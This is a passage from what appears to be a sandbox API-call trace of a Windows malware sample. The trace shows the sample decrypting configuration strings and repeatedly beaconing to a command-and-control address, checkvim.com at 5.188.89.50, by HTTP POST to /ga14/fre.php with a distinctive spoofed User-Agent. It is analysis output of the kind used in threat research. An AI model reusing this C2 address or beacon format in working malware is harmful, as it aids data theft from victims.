(lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0258.778] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0258.779] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0258.780] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0258.780] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0258.781] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0258.781] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0258.781] GetProcessHeap () returned 0x840000 [0258.781] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871420 [0258.781] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0258.782] GetProcessHeap () returned 0x840000 [0258.782] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871420 | out: hHeap=0x840000) returned 1 [0258.782] GetProcessHeap () returned 0x840000 [0258.782] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0258.782] GetProcessHeap () returned 0x840000 [0258.782] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc20 | out: hHeap=0x840000) returned 1 [0258.782] GetProcessHeap () returned 0x840000 [0258.782] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fb48 [0258.783] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0258.783] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0258.799] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0258.799] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86ff90) returned 1 [0258.826] GetProcessHeap () returned 0x840000 [0258.826] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0258.827] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0258.827] CryptImportKey (in: hProv=0x86ff90, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e970) returned 1 [0258.828] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0258.828] CryptSetKeyParam (hKey=0x87e970, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0258.829] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0258.829] CryptSetKeyParam (hKey=0x87e970, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0258.829] GetProcessHeap () returned 0x840000 [0258.830] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0258.830] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0258.831] CryptDecrypt (in: hKey=0x87e970, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fb48, pdwDataLen=0x19f9a4 | out: pbData=0x87fb48, pdwDataLen=0x19f9a4) returned 1 [0258.831] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0258.832] CryptDestroyKey (hKey=0x87e970) returned 1 [0258.833] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0258.833] CryptReleaseContext (hProv=0x86ff90, dwFlags=0x0) returned 1 [0258.833] GetProcessHeap () returned 0x840000 [0258.833] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0258.834] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0258.838] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0258.839] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0258.839] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0258.840] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0258.840] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0258.840] GetProcessHeap () returned 0x840000 [0258.840] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871510 [0258.840] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ad0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0258.844] GetProcessHeap () returned 0x840000 [0258.844] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0258.844] socket (af=2, type=1, protocol=6) returned 0x3b0 [0258.844] connect (s=0x3b0, name=0x878ad0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0258.922] FreeAddrInfoW (pAddrInfo=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ad0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0258.922] GetProcessHeap () returned 0x840000 [0258.922] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0258.922] GetProcessHeap () returned 0x840000 [0258.922] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0258.924] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0258.925] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0258.925] GetProcessHeap () returned 0x840000 [0258.925] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0258.925] GetProcessHeap () returned 0x840000 [0258.925] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0258.925] GetProcessHeap () returned 0x840000 [0258.925] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f5f0 [0258.925] GetProcessHeap () returned 0x840000 [0258.925] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0258.926] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0258.927] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0258.927] GetProcessHeap () returned 0x840000 [0258.927] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0258.927] GetProcessHeap () returned 0x840000 [0258.927] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0258.927] send (s=0x3b0, buf=0x873a58*, len=237, flags=0) returned 237 [0258.927] send (s=0x3b0, buf=0x87eb58*, len=159, flags=0) returned 159 [0258.927] GetProcessHeap () returned 0x840000 [0258.927] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0258.927] recv (in: s=0x3b0, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0259.312] GetProcessHeap () returned 0x840000 [0259.313] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0259.313] GetProcessHeap () returned 0x840000 [0259.313] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0259.313] GetProcessHeap () returned 0x840000 [0259.313] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0259.313] GetProcessHeap () returned 0x840000 [0259.313] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0259.313] closesocket (s=0x3b0) returned 0 [0259.313] GetProcessHeap () returned 0x840000 [0259.313] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0259.313] GetProcessHeap () returned 0x840000 [0259.313] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0259.313] GetProcessHeap () returned 0x840000 [0259.314] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb48 | out: hHeap=0x840000) returned 1 [0259.314] GetProcessHeap () returned 0x840000 [0259.314] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871510 | out: hHeap=0x840000) returned 1 [0259.314] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x1104) returned 0x3b0 [0259.315] Sleep (dwMilliseconds=0xea60) [0259.349] GetProcessHeap () returned 0x840000 [0259.349] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f5f0 [0259.350] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0259.350] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0259.579] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0259.580] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0259.624] GetProcessHeap () returned 0x840000 [0259.624] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0259.625] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0259.625] CryptImportKey (in: hProv=0x870128, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e3f0) returned 1 [0259.626] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0259.626] CryptSetKeyParam (hKey=0x87e3f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0259.627] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0259.627] CryptSetKeyParam (hKey=0x87e3f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0259.627] GetProcessHeap () returned 0x840000 [0259.627] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0259.628] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0259.628] CryptDecrypt (in: hKey=0x87e3f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f5f0, pdwDataLen=0x19f9a4 | out: pbData=0x87f5f0, pdwDataLen=0x19f9a4) returned 1 [0259.629] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0259.629] CryptDestroyKey (hKey=0x87e3f0) returned 1 [0259.629] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0259.630] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0259.630] GetProcessHeap () returned 0x840000 [0259.630] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0259.630] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0259.631] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0259.631] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0259.633] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0259.634] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0259.634] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0259.635] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0259.635] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0259.635] GetProcessHeap () returned 0x840000 [0259.635] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871498 [0259.635] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0259.635] GetProcessHeap () returned 0x840000 [0259.635] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871498 | out: hHeap=0x840000) returned 1 [0259.635] GetProcessHeap () returned 0x840000 [0259.635] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0259.635] GetProcessHeap () returned 0x840000 [0259.635] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0259.636] GetProcessHeap () returned 0x840000 [0259.636] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fc20 [0259.636] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0259.636] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0259.641] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0259.642] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f798) returned 1 [0259.648] GetProcessHeap () returned 0x840000 [0259.648] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0259.649] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0259.649] CryptImportKey (in: hProv=0x86f798, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e5b0) returned 1 [0259.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0259.650] CryptSetKeyParam (hKey=0x87e5b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0259.651] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0259.651] CryptSetKeyParam (hKey=0x87e5b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0259.651] GetProcessHeap () returned 0x840000 [0259.651] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0259.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0259.656] CryptDecrypt (in: hKey=0x87e5b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fc20, pdwDataLen=0x19f9a4 | out: pbData=0x87fc20, pdwDataLen=0x19f9a4) returned 1 [0259.657] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0259.657] CryptDestroyKey (hKey=0x87e5b0) returned 1 [0259.658] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0259.658] CryptReleaseContext (hProv=0x86f798, dwFlags=0x0) returned 1 [0259.658] GetProcessHeap () returned 0x840000 [0259.658] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0259.659] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0259.659] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0259.659] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0259.660] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0259.660] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0259.661] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0259.661] GetProcessHeap () returned 0x840000 [0259.661] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8714e8 [0259.661] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878aa0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0259.663] GetProcessHeap () returned 0x840000 [0259.663] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c68 [0259.663] socket (af=2, type=1, protocol=6) returned 0x3b4 [0259.663] connect (s=0x3b4, name=0x878aa0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0259.735] FreeAddrInfoW (pAddrInfo=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878aa0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0259.735] GetProcessHeap () returned 0x840000 [0259.735] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fce8 [0259.735] GetProcessHeap () returned 0x840000 [0259.735] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0259.736] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0259.736] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0259.736] GetProcessHeap () returned 0x840000 [0259.737] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0259.737] GetProcessHeap () returned 0x840000 [0259.737] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0259.737] GetProcessHeap () returned 0x840000 [0259.737] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fcb0 [0259.737] GetProcessHeap () returned 0x840000 [0259.737] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0259.737] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0259.738] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0259.738] GetProcessHeap () returned 0x840000 [0259.738] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0259.738] GetProcessHeap () returned 0x840000 [0259.738] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0259.738] send (s=0x3b4, buf=0x873a58*, len=237, flags=0) returned 237 [0259.740] send (s=0x3b4, buf=0x87eb58*, len=159, flags=0) returned 159 [0259.740] GetProcessHeap () returned 0x840000 [0259.740] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0259.740] recv (in: s=0x3b4, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0260.086] GetProcessHeap () returned 0x840000 [0260.086] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0260.086] GetProcessHeap () returned 0x840000 [0260.086] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fcb0 | out: hHeap=0x840000) returned 1 [0260.086] GetProcessHeap () returned 0x840000 [0260.086] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0260.086] GetProcessHeap () returned 0x840000 [0260.086] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fce8 | out: hHeap=0x840000) returned 1 [0260.086] closesocket (s=0x3b4) returned 0 [0260.087] GetProcessHeap () returned 0x840000 [0260.087] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c68 | out: hHeap=0x840000) returned 1 [0260.087] GetProcessHeap () returned 0x840000 [0260.087] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0260.087] GetProcessHeap () returned 0x840000 [0260.087] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc20 | out: hHeap=0x840000) returned 1 [0260.087] GetProcessHeap () returned 0x840000 [0260.087] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8714e8 | out: hHeap=0x840000) returned 1 [0260.087] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x103c) returned 0x3b4 [0260.089] Sleep (dwMilliseconds=0xea60) [0260.090] GetProcessHeap () returned 0x840000 [0260.090] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f758 [0260.091] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0260.092] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0260.172] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0260.172] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fac8) returned 1 [0260.184] GetProcessHeap () returned 0x840000 [0260.184] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0260.185] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0260.185] CryptImportKey (in: hProv=0x86fac8, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7b0) returned 1 [0260.186] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0260.186] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0260.187] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0260.187] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0260.187] GetProcessHeap () returned 0x840000 [0260.187] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0260.188] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0260.188] CryptDecrypt (in: hKey=0x87e7b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f758, pdwDataLen=0x19f9a4 | out: pbData=0x87f758, pdwDataLen=0x19f9a4) returned 1 [0260.224] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0260.224] CryptDestroyKey (hKey=0x87e7b0) returned 1 [0260.225] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0260.225] CryptReleaseContext (hProv=0x86fac8, dwFlags=0x0) returned 1 [0260.225] GetProcessHeap () returned 0x840000 [0260.225] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0260.226] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0260.226] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0260.226] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0260.227] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0260.227] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0260.260] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0260.261] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0260.261] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0260.261] GetProcessHeap () returned 0x840000 [0260.261] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713f8 [0260.261] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), 